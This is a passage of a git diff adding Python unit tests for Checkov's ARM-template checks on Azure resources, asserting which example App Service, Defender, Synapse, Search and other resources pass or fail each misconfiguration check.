+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AppServicePythonVersion.py b/tests/arm/checks/resource/test_AppServicePythonVersion.py
new file mode 100644
index 00000000000..bb7219084ae
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServicePythonVersion.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AppServicePythonVersion import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAppServicePythonVersion(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServicePythonVersion"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+            "Microsoft.Web/sites.unknown",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py b/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py
new file mode 100644
index 00000000000..adda9dccc97
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceRemoteDebuggingNotEnabled.py
@@ -0,0 +1,36 @@
+import os
+import unittest
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AppServiceRemoteDebuggingNotEnabled import check
+
+
+class TestAppServiceRemoteDebuggingNotEnabled(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AppServiceRemoteDebuggingNotEnabled")
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+            "Microsoft.Web/sites.pass1",
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
diff --git a/tests/arm/checks/resource/test_AppServiceSetHealthCheck.py b/tests/arm/checks/resource/test_AppServiceSetHealthCheck.py
new file mode 100644
index 00000000000..d8b16273ce0
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceSetHealthCheck.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppServiceSetHealthCheck import check
+
+
+class TestAppServiceSetHealthCheck(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServiceSetHealthCheck"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+            "Microsoft.Web/sites/slots.pass2",
+
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+            "Microsoft.Web/sites/slots.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AppServiceSlotDebugDisabled.py b/tests/arm/checks/resource/test_AppServiceSlotDebugDisabled.py
new file mode 100644
index 00000000000..096828fe8de
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceSlotDebugDisabled.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppServiceSlotDebugDisabled import check
+
+
+class TestAppServiceSlotDebugDisabled(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServiceSlotDebugDisabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+            "Microsoft.Web/sites/slots.pass2",
+
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+            "Microsoft.Web/sites/slots.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AppServiceSlotHTTPSOnly.py b/tests/arm/checks/resource/test_AppServiceSlotHTTPSOnly.py
new file mode 100644
index 00000000000..f87cb5ca5fd
--- /dev/null
+++ b/tests/arm/checks/resource/test_AppServiceSlotHTTPSOnly.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AppServiceSlotHTTPSOnly import check
+
+
+class TestAppServiceSlotHTTPSOnly(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AppServiceSlotHTTPSOnly"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Web/sites.pass",
+            "Microsoft.Web/sites/slots.pass2",
+
+        }
+        failing_resources = {
+            "Microsoft.Web/sites.fail",
+            "Microsoft.Web/sites/slots.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AutomationEncrypted.py b/tests/arm/checks/resource/test_AutomationEncrypted.py
new file mode 100644
index 00000000000..31e3afc609a
--- /dev/null
+++ b/tests/arm/checks/resource/test_AutomationEncrypted.py
@@ -0,0 +1,36 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.AutomationEncrypted import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAutomationEncrypted(unittest.TestCase):
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_AutomationEncrypted"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Automation/automationAccounts/variables.pass",
+        }
+
+        failing_resources = {
+            "Microsoft.Automation/automationAccounts/variables.fail",
+            "Microsoft.Automation/automationAccounts/variables.fail1",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py b/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py
new file mode 100644
index 00000000000..f788cd6b313
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureBatchAccountUsesKeyVaultEncryption.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.AzureBatchAccountUsesKeyVaultEncryption import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureBatchAccountUsesKeyVaultEncryption(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AzureBatchAccountUsesKeyVaultEncryption"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Batch/batchAccounts.pass",
+        }
+        failing_resources = {
+            "Microsoft.Batch/batchAccounts.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureDataExplorerDoubleEncryptionEnabled.py b/tests/arm/checks/resource/test_AzureDataExplorerDoubleEncryptionEnabled.py
new file mode 100644
index 00000000000..6b1fd50b148
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureDataExplorerDoubleEncryptionEnabled.py
@@ -0,0 +1,33 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.AzureDataExplorerDoubleEncryptionEnabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureDataExplorerDoubleEncryptionEnabled(unittest.TestCase):
+    def test_summary(self):
+        test_files_dir = Path(__file__).parent / "example_AzureDataExplorerDoubleEncryptionEnabled"
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+        passing_resources = {
+            "Microsoft.Kusto/clusters.pass"
+        }
+        failing_resources = {
+            "Microsoft.Kusto/clusters.fail"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        assert summary["passed"] == len(passing_resources)
+        assert summary["failed"] == len(failing_resources)
+        assert summary["skipped"] == 0
+        assert summary["parsing_errors"] == 0
+
+        assert passed_check_resources == passing_resources
+        assert failed_check_resources == failing_resources
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureDefenderOnKeyVaults.py b/tests/arm/checks/resource/test_AzureDefenderOnKeyVaults.py
new file mode 100644
index 00000000000..e2d1663790f
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureDefenderOnKeyVaults.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+from checkov.arm.checks.resource.AzureDefenderOnKeyVaults import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureDefenderOnKeyVaults(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AzureDefenderOnKeyVaults"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Security/pricings.KeyVaults",
+        }
+        failing_resources = {
+            "Microsoft.Security/pricings.KeyVaults",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureDefenderOnKubernetes.py b/tests/arm/checks/resource/test_AzureDefenderOnKubernetes.py
new file mode 100644
index 00000000000..196750e6e85
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureDefenderOnKubernetes.py
@@ -0,0 +1,41 @@
+import unittest
+import os
+from checkov.arm.checks.resource.AzureDefenderOnKubernetes import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureDefenderOnKubernetes(unittest.TestCase):
+    def test_summary(self):
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        # given
+        test_files_dir = current_dir + "/example_AzureDefenderOnKubernetes"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+        passing_resources = {
+            "Microsoft.Security/pricings.KubernetesService",
+            "Microsoft.Security/pricings.KeyVaults",
+            "Microsoft.Security/pricings.SqlServerVirtualMachines",
+        }
+        failing_resources = {
+            "Microsoft.Security/pricings.KubernetesService",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary['passed'], 3)
+        self.assertEqual(summary['failed'], 1)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureDefenderOnSqlServersVMS.py b/tests/arm/checks/resource/test_AzureDefenderOnSqlServersVMS.py
new file mode 100644
index 00000000000..ffd2408a767
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureDefenderOnSqlServersVMS.py
@@ -0,0 +1,37 @@
+import unittest
+from pathlib import Path
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.AzureDefenderOnSqlServersVMS import check
+
+
+class TestAzureDefenderOnSqlServersVMS(unittest.TestCase):
+
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AzureDefenderOnSqlServersVMS"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Security/pricings.SqlServerVirtualMachines",
+        }
+
+        failing_resources = {
+            "Microsoft.Security/pricings.SqlServerVirtualMachines",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertSetEqual(passing_resources, passed_check_resources)
+        self.assertSetEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_AzureDefenderOnStorage.py b/tests/arm/checks/resource/test_AzureDefenderOnStorage.py
new file mode 100644
index 00000000000..015826b2750
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureDefenderOnStorage.py
@@ -0,0 +1,33 @@
+import unittest
+from checkov.arm.checks.resource.AzureDefenderOnStorage import check
+from pathlib import Path
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureDefenderOnStorage(unittest.TestCase):
+    def test_summary(self):
+        test_files_dir = Path(__file__).parent / "example_AzureDefenderOnStorage"
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+        passing_resources = {
+            "Microsoft.Security/pricings.pass",
+        }
+        failing_resources = {
+            "Microsoft.Security/pricings.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passed_check_resources, passing_resources)
+        self.assertEqual(failed_check_resources, failing_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py b/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py
new file mode 100644
index 00000000000..63d1b7407d5
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureMLWorkspacePrivateEndpoint.py
@@ -0,0 +1,42 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AzureMLWorkspacePrivateEndpoint import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureMLWorkspacePrivateEndpoint(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AzureMLWorkspacePrivateEndpoint"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.MachineLearningServices/workspaces.pass1",
+            "Microsoft.MachineLearningServices/workspaces.pass2"
+        }
+        failing_resources = {
+            "Microsoft.MachineLearningServices/workspaces.fail1",
+            "Microsoft.MachineLearningServices/workspaces.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureSearchSLAIndex.py b/tests/arm/checks/resource/test_AzureSearchSLAIndex.py
new file mode 100644
index 00000000000..daed8bc0956
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureSearchSLAIndex.py
@@ -0,0 +1,42 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AzureSearchSLAIndex import check
+
+
+class TestAzureSearchSLAIndex(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AzureSearchSLAIndex")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.Search/searchServices.pass'
+        }
+        failing_resources = {
+            'Microsoft.Search/searchServices.fail',
+            'Microsoft.Search/searchServices.fail2'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureSearchSLAQueryUpdates.py b/tests/arm/checks/resource/test_AzureSearchSLAQueryUpdates.py
new file mode 100644
index 00000000000..8289ed8f342
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureSearchSLAQueryUpdates.py
@@ -0,0 +1,42 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AzureSearchSLAQueryUpdates import check
+
+
+class TestAzureSearchSLAQueryUpdates(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AzureSearchSLAQueryUpdates")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.Search/searchServices.pass'
+        }
+        failing_resources = {
+            'Microsoft.Search/searchServices.fail',
+            'Microsoft.Search/searchServices.fail2'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureServiceFabricClusterProtectionLevel.py b/tests/arm/checks/resource/test_AzureServiceFabricClusterProtectionLevel.py
new file mode 100644
index 00000000000..ca6235024dd
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureServiceFabricClusterProtectionLevel.py
@@ -0,0 +1,42 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.AzureServiceFabricClusterProtectionLevel import check
+
+
+class TestAzureServiceFabricClusterProtectionLevel(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_AzureServiceFabricClusterProtectionLevel")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ServiceFabric/clusters.pass',
+        }
+        failing_resources = {
+            'Microsoft.ServiceFabric/clusters.fail',
+            'Microsoft.ServiceFabric/clusters.fail2',
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureSparkPoolIsolatedComputeEnabled.py b/tests/arm/checks/resource/test_AzureSparkPoolIsolatedComputeEnabled.py
new file mode 100644
index 00000000000..cb5f9b4053c
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureSparkPoolIsolatedComputeEnabled.py
@@ -0,0 +1,43 @@
+import logging
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AzureSparkPoolIsolatedComputeEnabled import check
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestAzureSparkPoolIsolatedComputeEnabled(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AzureSparkPoolIsolatedComputeEnabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Synapse/workspaces/bigDataPools.pass",
+        }
+        failing_resources = {
+            "Microsoft.Synapse/workspaces/bigDataPools.fail1",
+            "Microsoft.Synapse/workspaces/bigDataPools.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureSynapseWorkspaceVAisEnabled.py b/tests/arm/checks/resource/test_AzureSynapseWorkspaceVAisEnabled.py
new file mode 100644
index 00000000000..9ee5479b12a
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureSynapseWorkspaceVAisEnabled.py
@@ -0,0 +1,44 @@
+import logging
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AzureSynapseWorkspaceVAisEnabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSynapseWorkspaceVAisEnabled(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AzureSynapseWorkspaceVAisEnabled"
+        logging.warning(f"test_files_dir:  {test_files_dir}")
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Synapse/workspaces/vulnerabilityAssessments.pass",
+        }
+        failing_resources = {
+            "Microsoft.Synapse/workspaces/vulnerabilityAssessments.fail1",
+            "Microsoft.Synapse/workspaces/vulnerabilityAssessments.fail2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+        self.assertEqual(summary["resource_count"], 3)  # 3 unknown
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py b/tests/arm/checks/resource/test_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py
new file mode 100644
index 00000000000..c47533f22b2
--- /dev/null
+++ b/tests/arm/checks/resource/test_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py
@@ -0,0 +1,44 @@
+import logging
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached import check
+
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestSynapseWorkspaceHaveNoIPFirewallRulesAttached(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Synapse/workspaces.pass",
+            "Microsoft.Synapse/workspaces.pass2",
+        }
+        failing_resources = {
+            "Microsoft.Synapse/workspaces.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+        self.assertEqual(summary["resource_count"], 3)  # 3 unknown
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py b/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py
new file mode 100644
index 00000000000..c049788d9fb
--- /dev/null
+++ b/tests/arm/checks/resource/test_CognitiveServicesConfigureIdentity.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.CognitiveServicesConfigureIdentity import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestCognitiveServicesConfigureIdentity(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_CognitiveServicesConfigureIdentity"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.CognitiveServices/accounts.pass",
+        }
+        failing_resources = {
+            "Microsoft.CognitiveServices/accounts.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
